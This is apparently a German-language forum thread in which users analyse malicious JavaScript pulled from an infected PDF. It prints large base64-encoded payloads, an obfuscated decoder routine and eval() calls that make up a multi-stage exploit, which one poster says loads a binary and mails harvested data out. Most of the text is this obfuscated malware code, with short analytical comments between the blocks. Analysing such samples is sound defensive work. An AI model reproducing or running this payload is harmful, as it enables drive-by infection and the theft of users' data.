VWhQTmxvMk1FbFJXR0UyWDI1U1RWSjFTblZNUzA5VFFsQXdUR1IxVjNKSE5FVk1jWFpMTTNKa09UTjFjM1V4TlhadFgzVnVVMDFNUmpaTlIzWk9NVlZSTVhKaVVEQk5RalJOYkdRNU9WRlJjM2hqWkc1UFptZFlPR1J3VUd0TWQyUTVhblUyV1dKemRrRmtkVWhKUkZFMWVtNUNka3BIY25nNVVYVnphVVJTTmtoaVpIVndialp6VG1Jd2NFQk5jR1JSUjNkUk9UZGtjR0ZNZUVnM2QzRktPRjlNTlhCTWNuSTVXalpMTVc1RWRsRkVUSFpRVTFKWVVGTkhTMUU1WWpZMVVrYzJXV0pTUzFGdVREVjRNSGN3T1VkemFXMU5Wblo0YkV3Mk9WRlJjMDFFVlVobE4zVjFORGxpWDJGRU5rczJkMHh3VUY5M1gweGlRbDgwTmtSeldEQjNNRGszWkhCaFRIYzFkRTFpYVVWTVZtNVhUSEp5T1ZCZk5VOU1jalJoVTJSd01GOTRTRGQzY1VvNFgwdzFjRzUzY0hoM1lrdEpZblZrTVRCNFgwMUVWVWhsTjNWMU5EbGlYMGhmWDNCaGR6VjJlRm93WkRaSGMybHRUVloyZUd4TU5qVnROblZHVTJRMFpsOUVTbEV3ZHpBNU1HSTFPV1I0WkRSc2NYQm9UVFZLWjJaQ1JqRlJjSE5rVVZGemNrZEVWV2xIZUdSNFNVeFlTR05DTkRGUVoxQnZkekE1T1ZFd2NqbGFVWE5wTjNoek5HeHhjR2hOTlVwblprSkdZVkZ3YzE5SFJFcFJSM2g0WDB4M05YUk5ZbWxGVEZadVZ6RnpTa2RNZUhJNVdqQmtVVWQ0ZUY5TWVHUTBiSEZ3YUUwMVNtZG1Ra1l4VVhCelpGRlJjMDlIUkZWcFIzYzFkRTFpYVVWTVZtNVhNWE5LUjB4NGNqbGFNR1E1ZFhWNE9XUjNOWFJOWW1sRlRGWnVWekZ3U2tkTWVISTVTVEJrVVVkM1VUbGtZbEIzWTBjeWExTnhTbmd3ZHpBNU4yUndZVXhFTkVGQlVuQnljbUp1T1ZGUmMwRnVYelZsVFY5d01VUTJaRmhXY25ZeGJUWktTRVJ5ZGpGdE5rcElVM0prU2tkM2RuaHlOalpRWDBRMFFVRlNjSEp5WW00MWRWODFOV3cyZG5oTWVISTVVbEV5TUZaV1NsRkhSRFJCUVZKd2NuSmliamt6Y25JNWFsVXlNbE0yVVZGdVFqQTVVblYxVVUxU1gwZzVOalkyZDJKd1dXSkhObUZFTm5Oa1IzYzBjRFkyTmtaVFlsOUlPVFkyTmtSTWNHWkVWVFpHY2pZMlZtNWlOWEJmZDFGbFJGSndkbVpSYzFocWVGOTFUVWMxTWtkRU5FRkJVbkJ5Y21KdVpISjNNRGxSZFhOa1RFUTBabHBpU0ZsZmNtUktSM0o0SnlrNw=="\);
    le3nipQQ9R=cT5JMLJSBS\(Kjk05y\);
    eval\(le3nipQQ9R\);
    //ok, hab den code a weng untersucht

    es schaut danach aus als ob via javascript ne binary nachgeladen wird (weiß bis jetz ned genau wie, evt. n buffer overflow oder sowas [wird n array angelegt mit nem index von 1200 + ich denke darin is code])
    diese binary erweitert das script mit nem object namens "util"
    mit dem object kann man, so wies ausschaut, beliebig code ausführen (in dem script wohl ne weitere binary)

    was ich aber mit sicherheit sagen kann is, dass dieser exploit irgendwelche sachen ausließt und per mail vesendet

    is ganz interessant, vielleicht mag N0S mal a weng tiefer graben ^^
    ------
    atm mach ich erstmal nen syscheck, hab keine sandbox benutzt :kotz: (aber zum glück kein adminaxx ;))
     
  14. #13 30. Dezember 2008
    Zuletzt von einem Moderator bearbeitet: 14. April 2017
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Murdoc dieses 1. Javascript in dem pdf dient nur zum entschlüsseln eines weiteren Javascripts und das 2. Javascript entschlüsselt wieder ein Javascript. Das 3. Javascript ist dann das eigentliche Exploit.
    Wer diese Seite hostet ist sicher kein Anfänger, echt gut gemacht. Interessant ist auch das die Obfuskation des Javascript Codes bei jedem PDF neu erzeugt wird. Das macht es den Antivirenherstellern ziemlich schwer das zu erkennen...
    So sieht das erste Script bei mir aus:

    PHP:
                                     var  ghVLJIEqm5Yq = "" ;
                                    var 
    bcTm3E = "" ;
                                    function 
    VgYbPlrsoUtZB HEn9LnzMIYY  ) {
                                        var 
    zUh0LUEtKr5xLr  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" ;
                                        var 
    bOrGwSfiKY UR71r2VYBq4Pj CoLcfKC yS1e9i VytzFhKrMf4 YWQVe9ULNHTi5 gN2dX YQcq8whUblu rKywSSH  JlYpEdDFGkrs  0 aiJQQn3Ch  "" xVgWivmTneeHN  = [];
                                        
    HEn9LnzMIYY  +=  "" ;
                                        do {
                                            
    yS1e9i  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    VytzFhKrMf4  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    YWQVe9ULNHTi5  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    gN2dX  zUh0LUEtKr5xLr . indexOf ( HEn9LnzMIYY . charAt ( rKywSSH ++));
                                            
    YQcq8whUblu  yS1e9i << 18  VytzFhKrMf4 << 12  YWQVe9ULNHTi5 << gN2dX ;
                                            
    bOrGwSfiKY  YQcq8whUblu >> 16  0xff ;
                                            
    UR71r2VYBq4Pj  YQcq8whUblu >> 0xff ;
                                            
    CoLcfKC  YQcq8whUblu  0xff ;
                                            if (
    YWQVe9ULNHTi5  ==  64 ) {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY );
                                            } else if (
    gN2dX  ==  64 ) {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY UR71r2VYBq4Pj );
                                            } else {
                                                
    xVgWivmTneeHN [ JlYpEdDFGkrs ++] =  String . fromCharCode ( bOrGwSfiKY UR71r2VYBq4Pj CoLcfKC );
                                            }
                                        } while (
    rKywSSH  HEn9LnzMIYY . length );
                                        
    aiJQQn3Ch  xVgWivmTneeHN . join ( "" );
                                        
    aiJQQn3Ch  X3TPUwhKg ( aiJQQn3Ch );
                                        return 
    aiJQQn3Ch ;
                                    }
                                    function 
    X3TPUwhKg  bOrGwSfiKY  ) {
                                        var 
    UR71r2VYBq4Pj  = [],  CoLcfKC  yS1e9i  HEn9LnzMIYY  VytzFhKrMf4  YWQVe9ULNHTi5  0 ;
                                        
    bOrGwSfiKY  +=  "" ;
                                        while ( 
    CoLcfKC  bOrGwSfiKY . length  ) {
                                            
    HEn9LnzMIYY  bOrGwSfiKY . charCodeAt ( CoLcfKC );
                                            if (
    HEn9LnzMIYY  128 ) {
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ( HEn9LnzMIYY );
                                                
    CoLcfKC ++;
                                            } else if ((
    HEn9LnzMIYY  191 ) && ( HEn9LnzMIYY  224 )) {
                                                
    VytzFhKrMf4  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  31 ) <<  6 ) | ( VytzFhKrMf4  63 ));
                                                
    CoLcfKC  +=  2 ;
                                            } else {
                                                
    VytzFhKrMf4  bOrGwSfiKY . charCodeAt ( CoLcfKC + 1 );
                                                
    YWQVe9ULNHTi5  bOrGwSfiKY . charCodeAt ( CoLcfKC + 2 );
                                                
    UR71r2VYBq4Pj [ yS1e9i ++] =  String . fromCharCode ((( HEn9LnzMIYY  15 ) <<  12 ) | (( VytzFhKrMf4  63 ) <<  6 ) | ( YWQVe9ULNHTi5  63 ));
                                                
    CoLcfKC  +=  3 ;
                                            }
                                        }
                                        return 
    UR71r2VYBq4Pj . join ( "" );
                                    }

                    
    ghVLJIEqm5Yq VgYbPlrsoUtZB ( "Wm5WdVkzUnBiMjRnZEZocU5WVmFZMjBvVmxWeGFEUlpaRzF4WWlsN0lISmxkSFZ5YmlCVGRISnBibWRiSjJaeWIyMURhR0Z5UTI5a1pTZGRLRlpWY1dnMFdXUnRjV0lwTzMwZ1puVnVZM1JwYjI0Z2IxVjZWWFUyZEZSd1VWWktLRzVRVlZCSFRVMHBleUIyWVhJZ2NuVTVVR2hJZFVkQlYyczlNQ3dnWW5ScVRVOXlZbTVxYnoxdVVGVlFSMDFOTG14bGJtZDBhQ3dnYkc0eU9IUjJZajB4TURJMExDQnRPRE01VUZOamNDd2dRMEpWVnpWRWMxTTJWVWR2U1c0c0lHMXdRVEZyYlQwbkp5d2djM1ZzUlVwRlBYSjFPVkJvU0hWSFFWZHJMQ0JXZUhGTFVrNDljblU1VUdoSWRVZEJWMnNzSUc1SGMydHJPVm8wZG1Nd1BYSjFPVkJvU0hWSFFWZHJMQ0I0TUZaYWRHSlVaWEZ1ZEdnOVFYSnlZWGtvTmpNc01Dd3lMREl5TERFNUxETTRMREV4TERNeExESXdMRE01TERBc01Dd3dMREFzTUN3d0xESTNMRFUwTERReExETTJMRFEzTERRMkxEVTJMREk0TERVeExEVTVMRE13TERFMkxEVXNOaklzTVRnc01qUXNNelFzTlRJc01qa3NNU3cwTUN3ME1pd3hNaXcxT0N3MU1Dd3pOeXcyTVN3d0xEQXNNQ3d3TERRc01DdzJMRFE1TERVekxETTFMREl6TERFMExEUXpMREl4TERjc09DdzBOQ3d5TlN3ME5Td3pMREkyTERNekxETXlMRFUxTERZd0xEUTRMREV6TERFMUxERTNMRFUzTERrc01UQXBPeUJtYjNJb1EwSlZWelZFYzFNMlZVZHZTVzQ5VFdGMGFDNWpaV2xzS0dKMGFrMVBjbUp1YW04dmJHNHlPSFIyWWlrN1EwSlZWelZFYzFNMlZVZHZTVzQrY25VNVVHaElkVWRCVjJzN1EwSlZWelZFYzFNMlZVZHZTVzR0TFNsN0lHWnZjaWh0T0RNNVVGTmpjRDFOWVhSb0xtMXBiaWhpZEdwTlQzSmlibXB2TEd4dU1qaDBkbUlwTzIwNE16bFFVMk53UG5KMU9WQm9TSFZIUVZkck8yMDRNemxRVTJOd0xTMHNZblJxVFU5eVltNXFieTB0S1hzZ2JrZHphMnM1V2pSMll6QjhQU2g0TUZaYWRHSlVaWEZ1ZEdoYmJsQlZVRWROVFM1amFHRnlRMjlrWlVGMEtITjFiRVZLUlNzcktTMDBPRjBwUER4V2VIRkxVazQ3SUdsbUtGWjRjVXRTVGlsN0lHMXdRVEZyYlNzOWRGaHFOVlZhWTIwb05UWmVia2R6YTJzNVdqUjJZekFtTWpVMUtUc2dia2R6YTJzNVdqUjJZekErUGowNE95QldlSEZMVWs0dFBUSTdJSDBnWld4elpTQjdJRlo0Y1V0U1RqMDJPeUI5SUgwZ2ZTQmxkbUZzS0cxd1FURnJiU2s3SUgwZ2IxVjZWWFUyZEZSd1VWWktLQ2RxVEVFMGIxazVaV1ozT1ROaVVtZ3paamhMTkROalkwNUFXVXhPVWxOd1lWSlJYMjQyZEhReVVsRmZialowZERKU1VWOXVOblIwTWxKUlh6Sk5ZemxLVWxGUk1qWlJjVXBTVVVOdVptdGxNVkpSWHpGcVZHVXhVbEZmTVdweFN6SlNVVGczVFcxME1sSlJPRGQ2ZEhReVVsRTROMWQ0WlVwU1VUZzNNWEZMYmxKUlF6ZE5ZM0pLVWxGRE4wMTRPVGRTVVY4eFYxcHhOMUpSWHpkTllrczNVbEU0TjAxak9UZFNVVU51VmxFNU4xSlJPRGMyUXprM1VsRTRNVTE0TVc1U1VWOXVla1p5TWxKUk9ERk5lREZ1VWxGRGJscGpjbTVTVVRnM1RYQjBNbEpST0RkTll6bEtVbEZEYmxaUk9UZFNVVU5LVTNGME1sSlJRMjU1TVhSdVVsRTROM2xEWlRKU1VWOHlkbkYwTWxKUk9EZE5XVXN5VWxFNE4wMWpPVGRTVVRoS2VIaHhibEpSUTBwVFVUbEtVbEZSYm5ZeGRHNVNVVU51ZFVOTE1sSlJYekoyVVdVeVVsRTROMDFaY1RkU1VUZzNUV001TjFKUk9FcDRlSEZ1VWxGRFNsTlJjbTVTVVZGS2VGTjBibEpST0RKcVVYRTNVbEZmTW5aVU1UZFNVVGczVFhBeE4xSlJPRGROWXprM1VsRTRTbmg0Y1c1U1VVTktVMUZ5TWxKUlh6SnFNWFJ1VWxGZk1rMUNTekpTVVY4eWRqRnhOMUpST0RkTmJYRktVbEU0TjAxak9UZFNVVGhLZUhoeGJsSlJRMHBUUmprM1VsRkRNbHBUZEc1U1VWOHllRXh4YmxKUlh6SjJVWFJ1VWxFNE4wMUNTekZTVVRnM1RXTTVOMUpST0VwNGVIRnVVbEU0U2sxNE9VcFNVVjgzZGtaeE4xSlJPREY0UW5SS1VsRkRibVpEUzI1U1VVTTNka05sU2xKUk9EY3hjWEZ1VWxFNE4wMWpaVGRTVVVOS2VWRTVOMUpST0RGNGVIRnVVbEZEYmxack9VcFNVVGczVjFsbFNsSlJPRGRhVTB0dVVsRkRibFpVT1c1U1VVTTNkbFJsU2xKUlh6SjJWR1V4VWxFNE4wMTRNVzVTVVRnM1RXTTVOMUpSWHpGMlZEazNVbEZETjNWMFpURlNVVGd4VFcxcE1sSlJVVzR4Y1hSdVVsRTROMDFqT1RkU1VVTnVabEU1TjFKUlF6YzJRMlZLVWxGRE1uaDRNVzVTVVVNeVRYaDBTbEpSUTI1bVZEazNVbEZSU2sxWlpVcFNVVGd5YWpGMGJsSlJPRGROWXprM1VsRkRTazFqT1RkU1VUaEtlSGd4YmxKUlh6RjFSamxLVWxGRFNtWlJhVGRTVVVOS2VIZ3hibEpSWHpKMlJuSnVVbEU0TjAxVFN6ZFNVVGczVFdNNU4xSlJPRXA0WTNKS1VsRkRNakZyT1RkU1VVTktObEU1TjFKUlVVcDVYMHN5VWxGRE1qRXhTMHBTVVRnM1YxazVOMUpSWHpGNFRIUnVVbEU0TjAxak9UZFNVVGd4ZUZreE1sSlJRMjVXYXprM1VsRTROelpEWlVwU1VUZzNXbE5MYmxKUlEyNVdWRGx1VWxGRE4zWlVaVXBTVVRoS1RYQjBibEpST0RkTll6azNVbEZmTVhWUk9UZFNVVU5LZGxGcE1WSlJPRXA0WTNKS1VsRmZOMGx0T1VwU1VVTktTVzB4YmxKUk9ESnFWSEpLVWxGUlNrMU1TMHBTVVVOS1NVSTVOMUpST0VwNGVERnVVbEZmTVhWR2NqSlNVVU5LWmxGbFNsSlJRMHA0ZURGdVVsRmZNblpHY201U1VUZzNUVzF5U2xKUk9EZE5ZemszVWxFNE4wMVRTMjVTVVRneGVGa3hNbEpSUTI1V2F6azNVbEU0TjNaRFpVcFNVVGczYzFOTGJsSlJRMjVXVkRsdVVsRkROM1pVWlVwU1VVTTNUWEIwYmxKUk9EZE5ZemszVWxGZk1YVlJPVGRTVVVOdVZrTXhNbEpSUXpkTldXVktVbEU0TjFwVFMyNVNVVU51VmxRNWJsSlJRemQyVkdWS1VsRTROMDF3ZEc1U1VUZzNUV001TjFKUk9FcGFZemszVWxGRFNuTkNhVzVTVVY4eVdtTnlTbEpSWHpKYVkzSktVbEZmTWxwamNrcFNVVjh5V21OeVNsSlJYekkyUm5SS1VsRkRTblZST1VwU1VVTnVWbFJ5U2xKUlh6SnpiVXR1VWxGRFNuTlpNVEZTVVY4eVRWa3hNbEpSUTI1V1ZHVktVbEZEYmxaeGRESlNVVGczZGw5eE1sSlJRMHA2UmpGdVVsRkRTbE5SY2pKU1VUZ3hTWGd4YmxKUlEyNVdkSEl5VWxGRE4zbGZjVXBTVVRnM1NVeDBibEpSUTBwVFEzUktVbEU0TVZOR01XNVNVVGczU1cwNU4xSlJYemRKV1hSS1VsRTRTbVpVY1c1U1VWOXVla05sTjFKUlF6SkpZM0pLVWxGZk4wbENaVEZTVVRnM2FrTkxNVkpSUXpkTlkwc3lVbEU0TW5OaVpXNVNVVGczZGw5eFNsSlJReko1VkVzM1VsRTROMGxqT1RKU1VUaEtUVmt4TjFKUk9ESmFjREZ1VWxFNE1ubDBhVzVTVVRneGVFSmxNbEpSUTBwMWNVdEtVbEZmTWxaR01XNVNVVU5LZFVZeGJsSlJPRGRKYlRsS1VsRmZNVk5yY1RKU1VUZzNOa1l4YmxKUlEyNVdRMmx1VWxGRE56WlVaVzVTVVZFeWVsRnlTbEpST0RkWGVERnVVbEU0TjBsNE1XNVNVVU5LZVZSTFNsSlJRekp6UWpreVVsRTROMDFqY201U1VUZ3lWM0IwYmxKUk9ESnFRMHN5VWxGRFNuaFpNVEpTVVRoS05sUnBOMUpST0VwcVF6a3lVbEU0TjAxWlpUSlNVVkZ1VmtZeE1WSlJVVzVxY3pGdVVsRkRNazF0UzBwU1VWRnVabFJ4TjFKUlEyNVdSa3N4VWxGUk1tcEdTMjVTVVVOdVRWb3hNbEpSVVc1V2MzRXlVbEZEYmtsNFN6SlNVVU51TmxSTE4xSlJRMjV6ZUhFM1VsRkRibHBDY1RkU1VWRnVka1pMYmxKUlF6Sk5XblF5VWxGRGJrMTRkRXBTVVVOdVZrWkxNbEpSVVc1cVZFczNVbEZSYm1wR01URnZYMkl4VDBZNE0zcHdVelJUZUdNNGJHTm9RSFU0VERGT1dWOHhZMmhMTkROalkwNUFXVXhPVWxOd1lWSlJYeko0Y0V0S1VsRmZNbmh3UzBwdlgySXhabGxaVGs5UGFHaE1WREV5YmtZNE0zcHdjR1UzYUhGb2FIVlRUbkJhUXpONGVGazBVVUpvUjJWWldXNHpTMmhsTTFwTU5FdDFkRFJMVEV4b1VsTlRORk40WXpoc1kyaEFkVGhNTVU1Wlh6RmpiRk5vVW14alpWWlRURk5LV21oZlZreERaVFJaYUdWdFkwdG9NV3BvVGpFNGNsOU1kRGhMU25Wb00xSmpNMjVvVTNFNGVWTkxVbTVHT0RONmNIQm9hRUpaVGt4ME9FdEtkV2d6VW1NemJtaFRjVGg1VTB0U00yczRORzl0WHpSNlRGbG9OMU5UTWpoR1kyVjNWbkUwYkVKZllUWmlPRGczYURFMFUzaGpPR3hqYUVCMU9Fd3hUbGxmTVdOc1lrNTFRbU5PVmtJNE9ETmFURjlxUzFNMFUzaGpPR3hqYUVCMU9Fd3hUbGxmTVdOc1UyaFNiR05sVmxOb1RFcGFhRjl1YzE4NGQzZG9aVXRyWHpSM1dsbE1PR05aYURkaVh6ZzBSbU5sWDNFeFMyWnhNVEpxY1V0Zk5tSTRPRGRvZEU1V1RHTmxOR3RmTkhkYVkxOHphRmt6ZW5WeE5HeENYMkZzUWtOT2FHaHhhRkphWDJGNFFrTk9iRXhmWDNkV2NXVmxRbDlmZDNrNFUycFdTemd5ZDBzeWVuRXhNbTVmV1VzMFZuZGZibGxaVG5wb1kwOTNlVGhzVEd0Zk5IZGFZMTlxVEVFMGIxazVaV1ozT1ROaVVtZ3paamhETkd4Q1gyRkNlV05IZUhnNFVtdE1RMmhUV21oVGIwTnhNbE5VWWw5dlgwc3hVMTlMTVZOZlN6RnZWbkJoVTE5TE1WTmZjV0UwVkhjeFUxOUxNVzlXY0dFeE1URXhNVEV4TVRGVVlsOXZNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVZSaVgyOHhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVzlXY0dFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1XOVdjR0V4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4Y1dFMFZGTXhNVEV4TVRFeE1URXhNVEV4TVRFeE1XOVdjR0V4TVRFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRFeE1URXhWR0pmYnpFeE1URXhNVEV4TVRFeE1URXhNVEV4TVRGdlZrczBWa3hNYUROeFEwNTNiRXcwU2xOd1lWSjBTMjVxY1RFeVNrSlRURUo1WTBkNGVEaFNhMHhEYUZOYWFGOXVSbWcwTTIxTU5IZFNXV2hQT0V4dk9IZzVia1J3WDE5M2NXSkxUMFk0TTNwd1UwQjFXak14UjNCM1UwOVBhR1YyY0hkS2VrSTRNMU5UZDE5dWNYQmxkV3hqTTFaTVkyZ3pjRk5vTW5oeWJuQnRhVGhMVkV4bGRYUTFORFppY1RJM2RUbHZWWGxoVEU5UlRHOU5lVU5IYUZOME5GTkhjalJ5WXpOQWQzRmlTMDl6WHpoM2QyaGxUekZ3TTBkak1VQm1iVjl1ZW5OalIxVkNOVTh6UzJobE0xcE1ORXQ1Y0RKZlVVeHZUWGxEUjJoVGREUlRSM0kwY21NelFIZFdRek5IWXpGQVptMWZibnB6WTBkVlFqVlBUMVozVTA5VVRHVjFkRFUwTm1KeE1qZDFPVzlWZVVFeFRIQndNMGRqTVVCbWJWOXVlbk5qUjFWQ05VOVBPREZoYjJKb2JtdDRVVTVXVkhSbFNFSTFiMUJzWWs1MVFtTk9Wa0k0T0ROYVRGOXFTM2RsVkhnNVMxaG9UREYyVEhSU2RsSmxRRzFTY0RKM1ZqRmhlbU5NTkhWQ1EyaFBWRXhsZFhRMU5EWmljVEkzZFRsdlZYbEJNVTg0WDJGS1kwTm9RR0k0T0dWc1RHRmlZbkp2ZVZNNU5EaFRkMTlQVmw5aFpsbFpUazlSTldoNWVXVTNZbTFST0hSTVpUSXdRbWhvVHpneFlXb3hYekpBY0hRemFtdE1Na0IxTVdGbVdWbE9UM1ExTkdoak5VZDBlVGcwYldKcFlVeHhkelF6WTJOT1FGbE1UbEpUY0dGU1VWOXVOblIwTWxKUlgyNDJkSFF5VWxGZmJqWjBkREpTVVY4eVRXTTVTbEpSVVRJMlVYRktVbEZEYm1aclpURlNVVjh4YWxSbE1WSlJYekZxY1VzeVVsRTROMDF0ZERKU1VUZzNlblIwTWxKUk9EZFhlR1ZLVWxFNE56RnhTMjVTVVVNM1RXTnlTbEpSUXpkTmVEazNVbEZmTVZkYWNUZFNVVjgzVFdKTE4xSlJPRGROWXprM1VsRkRibFpST1RkU1VUZzNOa001TjFKUk9ERk5lREZ1VWxGZmJucEdjakpTVVRneFRYZ3hibEpSUTI1YVkzSnVVbEU0TjAxd2RESlNVVGczVFdNNVNsSlJRMjVXVVRrM1VsRkRTbE54ZERKU1VVTnVlVEYwYmxKUk9EZDVRMlV5VWxGZk1uWnhkREpTVVRnM1RWbExNbEpST0RkTll6azNVbEU0U25oNGNXNVNVVU5LVTFFNVNsSlJVVzUyTVhSdVVsRkRiblZEU3pKU1VWOHlkbEZsTWxKUk9EZE5XWEUzVWxFNE4wMWpPVGRTVVRoS2VIaHhibEpSUTBwVFVYSnVVbEZSU25oVGRHNVNVVGd5YWxGeE4xSlJYekoyVkRFM1VsRTROMDF3TVRkU1VUZzNUV001TjFKUk9FcDRlSEZ1VWxGRFNsTlJjakpTVVY4eWFqRjBibEpSWHpKTlFrc3lVbEZmTW5ZeGNUZFNVVGczVFcxeFNsSlJPRGROWXprM1VsRTRTbmg0Y1c1U1VVTktVMFk1TjFKUlF6SmFVM1J1VWxGZk1uaE1jVzVTVVY4eWRsRjBibEpST0RkTlFrc3hVbEU0TjAxak9UZFNVVGhLZUhoeGJsSlJPRXBOZURsS1VsRmZOM1pHY1RkU1VUZ3hlRUowU2xKUlEyNW1RMHR1VWxGRE4zWkRaVXBTVVRnM01YRnhibEpST0RkTlkyVTNVbEZEU25sUk9UZFNVVGd4ZUhoeGJsSlJRMjVXYXpsS1VsRTROMWRaWlVwU1VUZzNXbE5MYmxKUlEyNVdWRGx1VWxGRE4zWlVaVXBTVVY4eWRsUmxNVkpST0RkTmVERnVVbEU0TjAxak9UZFNVVjh4ZGxRNU4xSlJRemQxZEdVeFVsRTRNVTF0YVRKU1VWRnVNWEYwYmxKUk9EZE5ZemszVWxGRGJtWlJPVGRTVVVNM05rTmxTbEpSUXpKNGVERnVVbEZETWsxNGRFcFNVVU51WmxRNU4xSlJVVXBOV1dWS1VsRTRNbW94ZEc1U1VUZzNUV001TjFKUlEwcE5ZemszVWxFNFNuaDRNVzVTVVY4eGRVWTVTbEpSUTBwbVVXazNVbEZEU25oNE1XNVNVVjh5ZGtaeWJsSlJPRGROVTBzM1VsRTROMDFqT1RkU1VUaEtlR055U2xKUlF6SXhhemszVWxGRFNqWlJPVGRTVVZGS2VWOUxNbEpSUXpJeE1VdEtVbEU0TjFkWk9UZFNVVjh4ZUV4MGJsSlJPRGROWXprM1VsRTRNWGhaTVRKU1VVTnVWbXM1TjFKUk9EYzJRMlZLVWxFNE4xcFRTMjVTVVVOdVZsUTVibEpSUXpkMlZHVktVbEU0U2sxd2RHNVNVVGczVFdNNU4xSlJYekYxVVRrM1VsRkRTblpSYVRGU1VUaEtlR055U2xKUlh6ZEpiVGxLVWxGRFNrbHRNVzVTVVRneWFsUnlTbEpSVVVwTlRFdEtVbEZEU2tsQ09UZFNVVGhLZUhneGJsSlJYekYxUm5JeVVsRkRTbVpSWlVwU1VVTktlSGd4YmxKUlh6SjJSbkp1VWxFNE4wMXRja3BTVVRnM1RXTTVOMUpST0RkTlUwdHVVbEU0TVhoWk1USlNVVU51Vm1zNU4xSlJPRGQyUTJWS1VsRTROM05UUzI1U1VVTnVWbFE1YmxKUlF6ZDJWR1ZLVWxGRE4wMXdkRzVTVVRnM1RXTTVOMUpSWHpGMVVUazNVbEZEYmxaRE1USlNVVU0zVFZsbFNsSlJPRGRhVTB0dVVsRkRibFpVT1c1U1VVTTNkbFJsU2xKUk9EZE5jSFJ1VWxFNE4wMWpPVGRTVVRoS1dtTTVOMUpSUTBwelFtbHVVbEZmTWxwamNrcFNVVjh5V21OeVNsSlJYekphWTNKS1VsRmZNbHBqY2twU1VWOHlOa1owU2xKUlEwcDFVVGxLVWxGRGJsWlVja3BTVVY4eWMyMUxibEpSUTBweldURXhVbEZmTWsxWk1USlNVVU51VmxSbFNsSlJRMjVXY1hReVVsRTROM1pmY1RKU1VVTktla1l4YmxKUlEwcFRVWEl5VWxFNE1VbDRNVzVTVVVOdVZuUnlNbEpSUXpkNVgzRktVbEU0TjBsTWRHNVNVVU5LVTBOMFNsSlJPREZUUmpGdVVsRTROMGx0T1RkU1VWODNTVmwwU2xKUk9FcG1WSEZ1VWxGZmJucERaVGRTVVVNeVNXTnlTbEpSWHpkSlFtVXhVbEU0TjJwRFN6RlNVVU0zVFdOTE1sSlJPREp6WW1WdVVsRTROM1pmY1VwU1VVTXllVlJMTjFKUk9EZEpZemt5VWxFNFNrMVpNVGRTVVRneVduQXhibEpST0RKNWRHbHVVbEU0TVhoQ1pUSlNVVU5LZFhGTFNsSlJYekpXUmpGdVVsRkRTblZHTVc1U1VUZzNTVzA1U2xKUlh6RlRhM0V5VWxFNE56WkdNVzVTVVVOdVZrTnBibEpSUXpjMlZHVnVVbEZSTW5wUmNrcFNVVGczVjNneGJsSlJPRGRKZURGdVVsRkRTbmxVUzBwU1VVTXljMEk1TWxKUk9EZE5ZM0p1VWxFNE1sZHdkRzVTVVRneWFrTkxNbEpSUTBwNFdURXlVbEU0U2paVWFUZFNVVGhLYWtNNU1sSlJPRGROV1dVeVVsRkRibE5yY1RkU1VWRXljM2d4YmxKUlVXNDJWSEZ1VWxGRGJrbGFNVEpTVVZFeVZtc3hOMjlmWWpGUFJqZ3plbkJUTkdwaVFVNTJTMHhoVEhGVE1qRmlNVEpxY1RFeWFsWXhZV1paV1U1UFVVTlNVbmRaTkZCVE0yOVBPREZoYTNnNGFHMTVhVWN5WXpoQWMyeFRhRkpzWTJWV1UweGhUbkZ3TW01eGNEUnNRbDloVW5BMU56SjVaV2d4Y3pneGNscFJVbTFqWVdGTWNWTTBhbUpCVG5aTFRHRm9jVk5mZFd4bFpUaDRRMDl4V1VGZmFqRlJNakZmWWpGUFJqZ3plbkJ3TTBkak1VQm1iVjl1ZW5OalIxVkNOVTlQT0RGaGRXeG9aVFp0YUROcVkweGZiMUYzTkZOeFN6RnFVWGMwVTNGTE1XcFVkMTl1Y1hBelIyTXhRR1p0WDI1NmMyTkhWVUkxVDA4NE1XRTRlVU0zZGw5QlNrdFRjRE5IWXpGQVptMWZibnB6WTBkVlFqVlBPSEYzWlZSNE9VdFlhRXd4ZGt4MFVuWlNaVUJ0VEdJeFQwWTRNM3B3WW05Q2JGbEhSM0F4WlZOck5UaGxkV016VHpneFlVdFJOV2g1ZVdVM1ltMVJPSFJNWlRJd1FtaG9UemhUWVdveFgyNXFjVEV5YW5GTFgyVjBYMDVyYlZGdU9IVXhZVXBTV1U1UE1YQTBiRUpmWVVwNE0wZDJSa3hIVmxvelUycFdjV1ZGVEhKdVNsTnBORVIzZEc5Q2JGbEhSM0F4WlZOck5UaGxkV016YmtaWlFHSmFjV1YwWWxGQU5GWjNYMDlXWDJGclkxRkFVM1JqVDBwNE0wZDJSa3hIVmxvemJFODRNV0Z2WW1odWEzaFJUbFpVZEdWSVFqVnZVSEJpWDA5ME5UUm9ZelZIZEhrNE5HMWljakZQT0Y5aFRIQndaWFZzWXpOV1RHTm9NM0IzT0RSQ2NtaEFVMlV6YlZOM1gwOVdYMkZtV1Zs